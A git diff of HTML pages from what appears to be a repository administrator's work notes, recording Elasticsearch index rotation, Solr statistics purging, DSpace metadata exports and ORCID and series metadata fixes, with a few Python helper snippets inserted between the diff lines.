                                                                +    "failed" : 0
                                                                +  }
                                                                +}
                                                                +$ curl -X PUT "localhost:9200/openrxv-items/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.b
                                                                +locks.write":true}}'
                                                                +$ curl -s -X POST http://localhost:9200/openrxv-items/_clone/openrxv-items-2021-01-25
                                                                +$ curl -XDELETE 'http://localhost:9200/openrxv-items'
                                                                +$ curl -X PUT "localhost:9200/openrxv-items-temp/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
                                                                +$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items
                                                                +$ curl -XDELETE 'http://localhost:9200/openrxv-items-temp'
                                                                +$ curl -XDELETE 'http://localhost:9200/openrxv-items-2021-01-25'
                                                                +
                                                                • Resume working on CG Core v2, I realized a few things:
                                                                  • We are trying to move from dc.identifier.issn (and ISBN) to cg.issn, but this is currently implemented as a “qualdrop” input in DSpace’s submission form, which only works to fill in the qualifier (i.e. dc.identifier.xxxx) @@ -601,12 +601,12 @@ java.lang.IllegalArgumentException: Invalid character found in the request targe
                                                                  • I filed a bug on DSpace’s issue tracker (though I accidentally hit Enter and submitted it before I finished, and there is no edit function)
                                                                  • Looking into a Linode report that the outbound traffic rate was high this morning:
                                                                  -
                                                                  # grep -E '26/Jan/2021:(08|09|10|11|12)' /var/log/nginx/rest.log | goaccess --log-format=COMBINED -
                                                                  -
                                                                    +
                                                                    # grep -E '26/Jan/2021:(08|09|10|11|12)' /var/log/nginx/rest.log | goaccess --log-format=COMBINED -
                                                                    +
                                                                    • The culprit seems to be the ILRI publications importer, so that’s OK
                                                                    • But I also see an IP in Jordan hitting the REST API 1,100 times today:
                                                                    -
                                                                    80.10.12.54 - - [26/Jan/2021:09:43:42 +0100] "GET /rest/rest/bitstreams/98309f17-a831-48ed-8f0a-2d3244cc5a1c/retrieve HTTP/2.0" 302 138 "http://wp.local/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36"
                                                                    +
                                                                    80.10.12.54 - - [26/Jan/2021:09:43:42 +0100] "GET /rest/rest/bitstreams/98309f17-a831-48ed-8f0a-2d3244cc5a1c/retrieve HTTP/2.0" 302 138 "http://wp.local/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36"
                                                                     
                                                                    • Seems to be someone from CodeObia working on WordPress
                                                                        @@ -615,8 +615,8 @@ java.lang.IllegalArgumentException: Invalid character found in the request targe
                                                                      • I purged all ~3,000 statistics hits that have the “http://wp.local/” referrer:
                                                                      -
                                                                      $ curl -s "http://localhost:8081/solr/statistics/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>referrer:http\:\/\/wp\.local\/</query></delete>"
                                                                      -
                                                                        +
                                                                        $ curl -s "http://localhost:8081/solr/statistics/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>referrer:http\:\/\/wp\.local\/</query></delete>"
                                                                        +
                                                                        -
                                                                        $ curl -XDELETE 'http://localhost:9200/openrxv-items-temp'
                                                                        -# start indexing in AReS
                                                                        -
                                                                          +
                                                                          $ curl -XDELETE 'http://localhost:9200/openrxv-items-temp'
                                                                          +# start indexing in AReS
                                                                          +
                                                                          • Sent out emails about CG Core v2 to Macaroni Bros, Fabio, Hector at CCAFS, Dani and Tariku
                                                                          • A bit more minor work on testing the series/report/journal changes for CG Core v2
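
The index rotation that recurs in these notes (set `openrxv-items` read-only, clone it to a dated backup, delete it, clone `openrxv-items-temp` over it, then delete the temp and backup indexes) could be scripted roughly as below. This is only a sketch: the names `rotation_plan` and `run_plan` are hypothetical and not part of OpenRXV or AReS, and it assumes Elasticsearch is reachable at `localhost:9200` as in the curl commands.

```python
import json
import urllib.request

ES = "http://localhost:9200"  # assumption: same host and port as the curl commands
READ_ONLY = {"settings": {"index.blocks.write": True}}


def rotation_plan(index, temp, backup):
    """Return the ordered (method, url, body) steps, mirroring the curl commands."""
    return [
        ("PUT", f"{ES}/{index}/_settings", READ_ONLY),    # block writes before cloning
        ("POST", f"{ES}/{index}/_clone/{backup}", None),  # back up the current index
        ("DELETE", f"{ES}/{index}", None),                # remove the current index
        ("PUT", f"{ES}/{temp}/_settings", READ_ONLY),     # block writes on the temp index
        ("POST", f"{ES}/{temp}/_clone/{index}", None),    # clone temp to the live name
        ("DELETE", f"{ES}/{temp}", None),                 # clean up the temp index
        ("DELETE", f"{ES}/{backup}", None),               # clean up the backup
    ]


def run_plan(plan):
    """Send each step in order; urlopen raises HTTPError on a 4xx/5xx reply, stopping the loop."""
    for method, url, body in plan:
        data = json.dumps(body).encode() if body is not None else None
        req = urllib.request.Request(url, data=data, method=method)
        if data is not None:
            req.add_header("Content-Type", "application/json")
        with urllib.request.urlopen(req) as resp:
            print(method, url, resp.status)


if __name__ == "__main__":
    # Dry run: print the steps instead of sending them.
    steps = rotation_plan("openrxv-items", "openrxv-items-temp", "openrxv-items-2021-01-25")
    for method, url, body in steps:
        print(method, url, json.dumps(body) if body else "")
```

Keeping the plan as plain data makes it easy to review the steps (or check the `_count` of the temp index first) before calling `run_plan`, since the deletes are not reversible once the backup is gone.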
                                                                          diff --git a/docs/2021-02/index.html b/docs/2021-02/index.html index 45f8efdfd..8236191c1 100644 --- a/docs/2021-02/index.html +++ b/docs/2021-02/index.html @@ -60,7 +60,7 @@ $ curl -s 'http://localhost:9200/openrxv-items-temp/_count?q=*&pretty } } "/> - + @@ -157,34 +157,34 @@ $ curl -s 'http://localhost:9200/openrxv-items-temp/_count?q=*&pretty
                                                                        • I had a call with CodeObia to discuss the work on OpenRXV
                                                                        • Check the results of the AReS harvesting from last night:
                                                                        -
                                                                        $ curl -s 'http://localhost:9200/openrxv-items-temp/_count?q=*&pretty'
                                                                        -{
                                                                        -  "count" : 100875,
                                                                        -  "_shards" : {
                                                                        -    "total" : 1,
                                                                        -    "successful" : 1,
                                                                        -    "skipped" : 0,
                                                                        -    "failed" : 0
                                                                        -  }
                                                                        -}
                                                                        -
                                                                          +
                                                                          $ curl -s 'http://localhost:9200/openrxv-items-temp/_count?q=*&pretty'
                                                                          +{
                                                                          +  "count" : 100875,
                                                                          +  "_shards" : {
                                                                          +    "total" : 1,
                                                                          +    "successful" : 1,
                                                                          +    "skipped" : 0,
                                                                          +    "failed" : 0
                                                                          +  }
                                                                          +}
                                                                          +
                                                                          • Set the current items index to read only and make a backup:
                                                                          -
                                                                          $ curl -X PUT "localhost:9200/openrxv-items/_settings" -H 'Content-Type: application/json' -d' {"settings": {"index.blocks.write":true}}'
                                                                          -$ curl -s -X POST http://localhost:9200/openrxv-items/_clone/openrxv-items-2021-02-01
                                                                          -
                                                                            +
                                                                            $ curl -X PUT "localhost:9200/openrxv-items/_settings" -H 'Content-Type: application/json' -d' {"settings": {"index.blocks.write":true}}'
                                                                            +$ curl -s -X POST http://localhost:9200/openrxv-items/_clone/openrxv-items-2021-02-01
                                                                            +
                                                                            • Delete the current items index and clone the temp one to it:
                                                                            -
                                                                            $ curl -XDELETE 'http://localhost:9200/openrxv-items'
                                                                            -$ curl -X PUT "localhost:9200/openrxv-items-temp/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
                                                                            -$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items
                                                                            -
                                                                              +
                                                                              $ curl -XDELETE 'http://localhost:9200/openrxv-items'
                                                                              +$ curl -X PUT "localhost:9200/openrxv-items-temp/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
                                                                              +$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items
                                                                              +
                                                                              • Then delete the temp and backup:
                                                                              -
                                                                              $ curl -XDELETE 'http://localhost:9200/openrxv-items-temp'
                                                                              -{"acknowledged":true}%
                                                                              -$ curl -XDELETE 'http://localhost:9200/openrxv-items-2021-02-01'
                                                                              -
                                                                                +
                                                                                $ curl -XDELETE 'http://localhost:9200/openrxv-items-temp'
                                                                                +{"acknowledged":true}%
                                                                                +$ curl -XDELETE 'http://localhost:9200/openrxv-items-2021-02-01'
                                                                                +
                                                                                • Meeting with Peter and Abenet about CGSpace goals and progress
                                                                                • Test submission to DSpace via REST API to see if Abenet can fix / reject it (submit workflow?)
                                                                                • Get Peter a list of users who have submitted or approved on DSpace everrrrrrr, so he can remove some
                                                                                • @@ -196,25 +196,25 @@ $ curl -XDELETE 'http://localhost:9200/openrxv-i
                                                                                • I tried to export the ILRI community from CGSpace but I got an error:
                                                                                -
                                                                                $ dspace metadata-export -i 10568/1 -f /tmp/2021-02-01-ILRI.csv
                                                                                -Loading @mire database changes for module MQM
                                                                                -Changes have been processed
                                                                                -Exporting community 'International Livestock Research Institute (ILRI)' (10568/1)
                                                                                -           Exception: null
                                                                                -java.lang.NullPointerException
                                                                                -        at com.google.common.base.Preconditions.checkNotNull(Preconditions.java:212)
                                                                                -        at com.google.common.collect.Iterators.concat(Iterators.java:464)
                                                                                -        at org.dspace.app.bulkedit.MetadataExport.addItemsToResult(MetadataExport.java:136)
                                                                                -        at org.dspace.app.bulkedit.MetadataExport.buildFromCommunity(MetadataExport.java:125)
                                                                                -        at org.dspace.app.bulkedit.MetadataExport.<init>(MetadataExport.java:77)
                                                                                -        at org.dspace.app.bulkedit.MetadataExport.main(MetadataExport.java:282)
                                                                                -        at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
                                                                                -        at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
                                                                                -        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
                                                                                -        at java.lang.reflect.Method.invoke(Method.java:498)
                                                                                -        at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:229)
                                                                                -        at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:81)
                                                                                -
                                                                                  +
                                                                                  $ dspace metadata-export -i 10568/1 -f /tmp/2021-02-01-ILRI.csv
                                                                                  +Loading @mire database changes for module MQM
                                                                                  +Changes have been processed
                                                                                  +Exporting community 'International Livestock Research Institute (ILRI)' (10568/1)
                                                                                  +           Exception: null
                                                                                  +java.lang.NullPointerException
                                                                                  +        at com.google.common.base.Preconditions.checkNotNull(Preconditions.java:212)
                                                                                  +        at com.google.common.collect.Iterators.concat(Iterators.java:464)
                                                                                  +        at org.dspace.app.bulkedit.MetadataExport.addItemsToResult(MetadataExport.java:136)
                                                                                  +        at org.dspace.app.bulkedit.MetadataExport.buildFromCommunity(MetadataExport.java:125)
                                                                                  +        at org.dspace.app.bulkedit.MetadataExport.<init>(MetadataExport.java:77)
                                                                                  +        at org.dspace.app.bulkedit.MetadataExport.main(MetadataExport.java:282)
                                                                                  +        at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
                                                                                  +        at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
                                                                                  +        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
                                                                                  +        at java.lang.reflect.Method.invoke(Method.java:498)
                                                                                  +        at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:229)
                                                                                  +        at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:81)
                                                                                  +
                                                                                  • I imported the production database to my local development environment and I get the same error… WTF is this?
                                                                                    • I was able to export another smaller community
                                                                                    • @@ -234,28 +234,28 @@ java.lang.NullPointerException
                                                                                    • Maria Garruccio sent me some new ORCID iDs for Bioversity authors, as well as a correction for Stefan Burkart’s iD
                                                                                    • I saved the new ones to a text file, combined them with the others, extracted the ORCID iDs themselves, and updated the names using resolve-orcids.py:
                                                                                    -
                                                                                    $ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml /tmp/bioversity-orcid-ids.txt | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq > /tmp/2021-02-02-combined-orcids.txt
                                                                                    -$ ./ilri/resolve-orcids.py -i /tmp/2021-02-02-combined-orcids.txt -o /tmp/2021-02-02-combined-orcid-names.txt
                                                                                    -
                                                                                      +
                                                                                      $ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml /tmp/bioversity-orcid-ids.txt | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq > /tmp/2021-02-02-combined-orcids.txt
                                                                                      +$ ./ilri/resolve-orcids.py -i /tmp/2021-02-02-combined-orcids.txt -o /tmp/2021-02-02-combined-orcid-names.txt
                                                                                      +
                                                                                      • I sorted the names and added the XML formatting in vim, then ran it through tidy:
                                                                                      -
                                                                                      $ tidy -xml -utf8 -m -iq -w 0 dspace/config/controlled-vocabularies/cg-creator-id.xml
                                                                                      -
                                                                                        +
                                                                                        $ tidy -xml -utf8 -m -iq -w 0 dspace/config/controlled-vocabularies/cg-creator-id.xml
                                                                                        +
                                                                                        • Then I added all the changed names plus Stefan’s incorrect ones to a CSV and processed them with fix-metadata-values.py:
                                                                                        -
                                                                                        $ cat 2021-02-02-fix-orcid-ids.csv 
                                                                                        -cg.creator.id,correct
                                                                                        -Burkart Stefan: 0000-0001-5297-2184,Stefan Burkart: 0000-0001-5297-2184
                                                                                        -Burkart Stefan: 0000-0002-7558-9177,Stefan Burkart: 0000-0001-5297-2184
                                                                                        -Stefan  Burkart: 0000-0001-5297-2184,Stefan Burkart: 0000-0001-5297-2184
                                                                                        -Stefan Burkart: 0000-0002-7558-9177,Stefan Burkart: 0000-0001-5297-2184
                                                                                        -Adina Chain Guadarrama: 0000-0002-6944-2064,Adina Chain-Guadarrama: 0000-0002-6944-2064
                                                                                        -Bedru: 0000-0002-7344-5743,Bedru B. Balana: 0000-0002-7344-5743
                                                                                        -Leigh Winowiecki: 0000-0001-5572-1284,Leigh Ann Winowiecki: 0000-0001-5572-1284
                                                                                        -Sander J. Zwart: 0000-0002-5091-1801,Sander Zwart: 0000-0002-5091-1801
                                                                                        -saul lozano-fuentes: 0000-0003-1517-6853,Saul Lozano: 0000-0003-1517-6853
                                                                                        -$ ./ilri/fix-metadata-values.py -i 2021-02-02-fix-orcid-ids.csv -db dspace63 -u dspace -p 'fuuu' -f cg.creator.id -t 'correct' -m 240
                                                                                        -
                                                                                          +
                                                                                          $ cat 2021-02-02-fix-orcid-ids.csv 
                                                                                          +cg.creator.id,correct
                                                                                          +Burkart Stefan: 0000-0001-5297-2184,Stefan Burkart: 0000-0001-5297-2184
                                                                                          +Burkart Stefan: 0000-0002-7558-9177,Stefan Burkart: 0000-0001-5297-2184
                                                                                          +Stefan  Burkart: 0000-0001-5297-2184,Stefan Burkart: 0000-0001-5297-2184
                                                                                          +Stefan Burkart: 0000-0002-7558-9177,Stefan Burkart: 0000-0001-5297-2184
                                                                                          +Adina Chain Guadarrama: 0000-0002-6944-2064,Adina Chain-Guadarrama: 0000-0002-6944-2064
                                                                                          +Bedru: 0000-0002-7344-5743,Bedru B. Balana: 0000-0002-7344-5743
                                                                                          +Leigh Winowiecki: 0000-0001-5572-1284,Leigh Ann Winowiecki: 0000-0001-5572-1284
                                                                                          +Sander J. Zwart: 0000-0002-5091-1801,Sander Zwart: 0000-0002-5091-1801
                                                                                          +saul lozano-fuentes: 0000-0003-1517-6853,Saul Lozano: 0000-0003-1517-6853
                                                                                          +$ ./ilri/fix-metadata-values.py -i 2021-02-02-fix-orcid-ids.csv -db dspace63 -u dspace -p 'fuuu' -f cg.creator.id -t 'correct' -m 240
                                                                                          +
                                                                                          • I also looked up which of these new authors might have existing items that are missing ORCID iDs
                                                                                          • I had to port my add-orcid-identifiers-csv.py to DSpace 6 UUIDs and I think it’s working but I want to do a few more tests because it uses a sequence for the metadata_value_id
                                                                                          @@ -263,23 +263,23 @@ $ ./ilri/fix-metadata-values.py -i 2021-02-02-fix-orcid-ids.csv -db dspace63 -u
                                                                                          • Tag forty-three items from Bioversity’s new authors with ORCID iDs using add-orcid-identifiers-csv.py:
                                                                                          -
                                                                                          $ cat /tmp/2021-02-02-add-orcid-ids.csv
                                                                                          -dc.contributor.author,cg.creator.id
                                                                                          -"Nchanji, E.",Eileen Bogweh Nchanji: 0000-0002-6859-0962
                                                                                          -"Nchanji, Eileen",Eileen Bogweh Nchanji: 0000-0002-6859-0962
                                                                                          -"Nchanji, Eileen Bogweh",Eileen Bogweh Nchanji: 0000-0002-6859-0962
                                                                                          -"Machida, Lewis",Lewis Machida: 0000-0002-0012-3997
                                                                                          -"Mockshell, Jonathan",Jonathan Mockshell: 0000-0003-1990-6657"
                                                                                          -"Aubert, C.",Celine Aubert: 0000-0001-6284-4821
                                                                                          -"Aubert, Céline",Celine Aubert: 0000-0001-6284-4821
                                                                                          -"Devare, M.",Medha Devare: 0000-0003-0041-4812
                                                                                          -"Devare, Medha",Medha Devare: 0000-0003-0041-4812
                                                                                          -"Benites-Alfaro, O.E.",Omar E. Benites-Alfaro: 0000-0002-6852-9598
                                                                                          -"Benites-Alfaro, Omar Eduardo",Omar E. Benites-Alfaro: 0000-0002-6852-9598
                                                                                          -"Johnson, Vincent",VINCENT JOHNSON: 0000-0001-7874-178X
                                                                                          -"Lesueur, Didier",didier lesueur: 0000-0002-6694-0869
                                                                                          -$ ./ilri/add-orcid-identifiers-csv.py -i /tmp/2021-02-02-add-orcid-ids.csv -db dspace -u dspace -p 'fuuu' -d
                                                                                          -
                                                                                            +
                                                                                            $ cat /tmp/2021-02-02-add-orcid-ids.csv
                                                                                            +dc.contributor.author,cg.creator.id
                                                                                            +"Nchanji, E.",Eileen Bogweh Nchanji: 0000-0002-6859-0962
                                                                                            +"Nchanji, Eileen",Eileen Bogweh Nchanji: 0000-0002-6859-0962
                                                                                            +"Nchanji, Eileen Bogweh",Eileen Bogweh Nchanji: 0000-0002-6859-0962
                                                                                            +"Machida, Lewis",Lewis Machida: 0000-0002-0012-3997
                                                                                            +"Mockshell, Jonathan",Jonathan Mockshell: 0000-0003-1990-6657"
                                                                                            +"Aubert, C.",Celine Aubert: 0000-0001-6284-4821
                                                                                            +"Aubert, Céline",Celine Aubert: 0000-0001-6284-4821
                                                                                            +"Devare, M.",Medha Devare: 0000-0003-0041-4812
                                                                                            +"Devare, Medha",Medha Devare: 0000-0003-0041-4812
                                                                                            +"Benites-Alfaro, O.E.",Omar E. Benites-Alfaro: 0000-0002-6852-9598
                                                                                            +"Benites-Alfaro, Omar Eduardo",Omar E. Benites-Alfaro: 0000-0002-6852-9598
                                                                                            +"Johnson, Vincent",VINCENT JOHNSON: 0000-0001-7874-178X
                                                                                            +"Lesueur, Didier",didier lesueur: 0000-0002-6694-0869
                                                                                            +$ ./ilri/add-orcid-identifiers-csv.py -i /tmp/2021-02-02-add-orcid-ids.csv -db dspace -u dspace -p 'fuuu' -d
                                                                                            +
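A mapping file like the one above is easy to get subtly wrong by hand, so it may be worth checking the `cg.creator.id` column before running the tagging script. The following is a minimal sketch, not part of `add-orcid-identifiers-csv.py`: the function name `find_bad_rows` and the "Name: ORCID" pattern are assumptions inferred from the sample rows, and it checks the format only, not the ORCID checksum.

```python
import csv
import io
import re

# Assumed shape of a cg.creator.id value: "Display Name: 0000-0000-0000-000X"
ORCID_VALUE = re.compile(r".+: \d{4}-\d{4}-\d{4}-\d{3}[\dX]")


def find_bad_rows(csv_text):
    """Return (line_number, value) pairs whose cg.creator.id looks malformed."""
    reader = csv.DictReader(io.StringIO(csv_text))
    bad = []
    for row in reader:
        value = row.get("cg.creator.id") or ""
        if not ORCID_VALUE.fullmatch(value):
            bad.append((reader.line_num, value))
    return bad


# A few rows copied from the file above, including the one with a stray
# trailing double quote after the identifier.
sample = '''dc.contributor.author,cg.creator.id
"Machida, Lewis",Lewis Machida: 0000-0002-0012-3997
"Mockshell, Jonathan",Jonathan Mockshell: 0000-0003-1990-6657"
"Johnson, Vincent",VINCENT JOHNSON: 0000-0001-7874-178X
'''

for line_number, value in find_bad_rows(sample):
    print(f"line {line_number}: {value!r}")
```

With the sample rows, only the Mockshell row should be reported, because its value ends in a quote character rather than the identifier.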
                                                                                            • I’m working on the CGSpace accession for Karl Rich’s Viet Nam Pig Model 2018 and I noticed his ORCID iD is missing from CGSpace
                                                                                              • I added it and tagged 141 items of his with the iD
                                                                                              • @@ -300,9 +300,9 @@ $ ./ilri/add-orcid-identifiers-csv.py -i /tmp/2021-02-02-add-orcid-ids.csv -db d
                                                                                            -
                                                                                            $ time chrt -b 0 dspace index-discovery -b
                                                                                            -$ dspace oai import -c
                                                                                            -
                                                                                              +
                                                                                              $ time chrt -b 0 dspace index-discovery -b
                                                                                              +$ dspace oai import -c
                                                                                              +
                                                                                              • Attend Accenture meeting for repository managers
                                                                                                • Not clear what the SMO wants to get out of us
                                                                                                • @@ -333,8 +333,8 @@ $ dspace oai import -c
                                                                                              -
                                                                                              $ ./ilri/delete-metadata-values.py -i /tmp/2020-10-28-Series-PB.csv -db dspace -u dspace -p 'fuuu' -f dc.relation.ispartofseries -m 43
                                                                                              -
                                                                                                +
                                                                                                $ ./ilri/delete-metadata-values.py -i /tmp/2020-10-28-Series-PB.csv -db dspace -u dspace -p 'fuuu' -f dc.relation.ispartofseries -m 43
                                                                                                +
                                                                                                • The corrected versions have a lot of encoding issues so I asked Peter to give me the correct ones so I can search/replace them:
                                                                                                  • CIAT Publicaçao
                                                                                                  • @@ -358,8 +358,8 @@ $ dspace oai import -c
                                                                                                  • I ended up using python-ftfy to fix those very easily, then replaced them in the CSV
                                                                                                  • Then I trimmed whitespace at the beginning, end, and around the “;”, and applied the 1,600 fixes using fix-metadata-values.py:
                                                                                                  -
                                                                                                  $ ./ilri/fix-metadata-values.py -i /tmp/2020-10-28-Series-PB.csv -db dspace -u dspace -p 'fuuu' -f dc.relation.ispartofseries -t 'correct' -m 43
                                                                                                  -
                                                                                                    +
                                                                                                    $ ./ilri/fix-metadata-values.py -i /tmp/2020-10-28-Series-PB.csv -db dspace -u dspace -p 'fuuu' -f dc.relation.ispartofseries -t 'correct' -m 43
                                                                                                    +
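The whitespace clean-up described above could be sketched roughly as follows. This is an illustration under assumptions, not the procedure actually used: the helper names are hypothetical, the `correct` column name is inferred from the `-t 'correct'` flag, and collapsing to a bare `;` with no surrounding spaces is a guess at the intended format. The encoding repair itself was done with python-ftfy and is not reproduced here.

```python
import csv
import io
import re


def normalize_series(value):
    """Trim outer whitespace and any whitespace around ';' separators."""
    return re.sub(r"\s*;\s*", ";", value.strip())


def build_fixes(values, field="dc.relation.ispartofseries"):
    """Return CSV text mapping each changed value to its corrected form."""
    out = io.StringIO()
    writer = csv.writer(out, lineterminator="\n")
    writer.writerow([field, "correct"])  # assumed header layout
    for value in values:
        fixed = normalize_series(value)
        if fixed != value:  # only emit rows that actually change
            writer.writerow([value, fixed])
    return out.getvalue()


# Made-up series values, for illustration only
print(build_fixes(["  Policy Brief ; 12 ", "Policy Brief;13"]))
```

Only values that differ after normalization are written, which keeps the fixes file limited to rows the script needs to touch.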
                                                                                                    • Help Peter debug an issue with one of Alan Duncan’s new FEAST Data reports on CGSpace
                                                                                                      • For some reason the item’s default policy was the “COLLECTION_492_DEFAULT_READ” group, which had zero members
                                                                                                      • @@ -372,12 +372,12 @@ $ dspace oai import -c
                                                                                                      • Run system updates on CGSpace (linode18), deploy latest 6_x-prod branch, and reboot the server
                                                                                                      • After the server came back up I started a full Discovery re-indexing:
                                                                                                      -
                                                                                                      $ time chrt -b 0 ionice -c2 -n7 nice -n19 dspace index-discovery -b
                                                                                                      -
                                                                                                      -real    247m30.850s
                                                                                                      -user    160m36.657s
                                                                                                      -sys     2m26.050s
                                                                                                      -
                                                                                                        +
                                                                                                        $ time chrt -b 0 ionice -c2 -n7 nice -n19 dspace index-discovery -b
                                                                                                        +
                                                                                                        +real    247m30.850s
                                                                                                        +user    160m36.657s
                                                                                                        +sys     2m26.050s
                                                                                                        +
                                                                                                        • Regarding the CG Core v2 migration, Fabio wrote to tell me that he is not using CGSpace directly, instead harvesting via GARDIAN
                                                                                                          • He gave me the contact of Sotiris Konstantinidis, who is the CTO at SCIO Systems and works on the GARDIAN platform
                                                                                                          • @@ -385,30 +385,30 @@ sys 2m26.050s
                                                                                                          • Delete the old Elasticsearch temp index to prepare for starting an AReS re-harvest:
                                                                                                          -
                                                                                                          $ curl -XDELETE 'http://localhost:9200/openrxv-items-temp'
                                                                                                          -# start indexing in AReS
                                                                                                          -

                                                                                                          2021-02-08

                                                                                                          +
                                                                                                          $ curl -XDELETE 'http://localhost:9200/openrxv-items-temp'
                                                                                                          +# start indexing in AReS
                                                                                                          +

                                                                                                          2021-02-08

                                                                                                          • Finish rotating the AReS indexes after the harvesting last night:
                                                                                                          -
                                                                                                          $ curl -s 'http://localhost:9200/openrxv-items-temp/_count?q=*&pretty'
                                                                                                          -{
                                                                                                          -  "count" : 100983,
                                                                                                          -  "_shards" : {
                                                                                                          -    "total" : 1,
                                                                                                          -    "successful" : 1,
                                                                                                          -    "skipped" : 0,
                                                                                                          -    "failed" : 0
                                                                                                          -  }
                                                                                                          -}
                                                                                                          -$ curl -X PUT "localhost:9200/openrxv-items/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write":true}}'
                                                                                                          -$ curl -s -X POST http://localhost:9200/openrxv-items/_clone/openrxv-items-2021-02-08
                                                                                                          -$ curl -XDELETE 'http://localhost:9200/openrxv-items'
                                                                                                          -$ curl -X PUT "localhost:9200/openrxv-items-temp/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
                                                                                                          -$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items
                                                                                                          -$ curl -XDELETE 'http://localhost:9200/openrxv-items-temp'
                                                                                                          -$ curl -XDELETE 'http://localhost:9200/openrxv-items-2021-02-08'
                                                                                                          -

                                                                                                          2021-02-10

                                                                                                          +
                                                                                                          $ curl -s 'http://localhost:9200/openrxv-items-temp/_count?q=*&pretty'
                                                                                                          +{
                                                                                                          +  "count" : 100983,
                                                                                                          +  "_shards" : {
                                                                                                          +    "total" : 1,
                                                                                                          +    "successful" : 1,
                                                                                                          +    "skipped" : 0,
                                                                                                          +    "failed" : 0
                                                                                                          +  }
                                                                                                          +}
                                                                                                          +$ curl -X PUT "localhost:9200/openrxv-items/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write":true}}'
                                                                                                          +$ curl -s -X POST http://localhost:9200/openrxv-items/_clone/openrxv-items-2021-02-08
                                                                                                          +$ curl -XDELETE 'http://localhost:9200/openrxv-items'
                                                                                                          +$ curl -X PUT "localhost:9200/openrxv-items-temp/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
                                                                                                          +$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items
                                                                                                          +$ curl -XDELETE 'http://localhost:9200/openrxv-items-temp'
                                                                                                          +$ curl -XDELETE 'http://localhost:9200/openrxv-items-2021-02-08'
                                                                                                          +
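The rotation above always follows the same order: block writes on the live index, clone it to a dated backup, delete it, then block writes on the temp index, clone it to the live name, and delete the temp and backup indexes. A minimal sketch of that sequence as data, so it can be reviewed before anything is deleted; the function names `rotation_plan` and `run` are hypothetical, and the endpoints are only the ones that appear in the curl commands above.

```python
import json
import urllib.request


def rotation_plan(live, temp, backup):
    """Return the ordered (method, path, body) steps for one index rotation."""
    block_writes = json.dumps({"settings": {"index.blocks.write": True}})
    return [
        ("PUT", f"/{live}/_settings", block_writes),   # make live read-only
        ("POST", f"/{live}/_clone/{backup}", None),    # keep a dated backup
        ("DELETE", f"/{live}", None),
        ("PUT", f"/{temp}/_settings", block_writes),   # make temp read-only
        ("POST", f"/{temp}/_clone/{live}", None),      # temp becomes live
        ("DELETE", f"/{temp}", None),
        ("DELETE", f"/{backup}", None),
    ]


def run(plan, base_url="http://localhost:9200"):
    """Send each step in order; urlopen raises on HTTP errors, stopping the run."""
    for method, path, body in plan:
        data = body.encode("utf-8") if body is not None else None
        headers = {"Content-Type": "application/json"} if body else {}
        request = urllib.request.Request(
            base_url + path, data=data, headers=headers, method=method
        )
        with urllib.request.urlopen(request) as response:
            print(method, path, response.status)


plan = rotation_plan(
    "openrxv-items", "openrxv-items-temp", "openrxv-items-2021-02-08"
)
for method, path, _ in plan:
    print(method, path)
```

Calling `run(plan)` would perform the rotation against a local Elasticsearch. It is deliberately not called here, since three of the steps are destructive.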

                                                                                                          2021-02-10

                                                                                                          • Talk to Abdullah from CodeObia about a few of the issues we filed on OpenRXV
                                                                                                              @@ -429,22 +429,22 @@ $ curl -XDELETE 'http://localhost:9200/openrxv-i
                                                                                                          -
                                                                                                          $ csvcut -c id /tmp/2021-02-10-ILRI.csv | sed '1d' | wc -l
                                                                                                          -30354
                                                                                                          -$ csvcut -c id /tmp/2021-02-10-ILRI.csv | sed '1d' | sort -u | wc -l
                                                                                                          -18555
                                                                                                          -$ csvcut -c id /tmp/2021-02-10-ILRI.csv | sed '1d' | sort | uniq -c | sort -h | tail
                                                                                                          -      5 c21a79e5-e24e-4861-aa07-e06703d1deb7
                                                                                                          -      5 c2460aa1-ae28-4003-9a99-2d7c5cd7fd38
                                                                                                          -      5 d73fb3ae-9fac-4f7e-990f-e394f344246c
                                                                                                          -      5 dc0e24fa-b7f5-437e-ac09-e15c0704be00
                                                                                                          -      5 dc50bcca-0abf-473f-8770-69d5ab95cc33
                                                                                                          -      5 e714bdf9-cc0f-4d9a-a808-d572e25c9238
                                                                                                          -      6 7dfd1c61-9e8c-4677-8d41-e1c4b11d867d
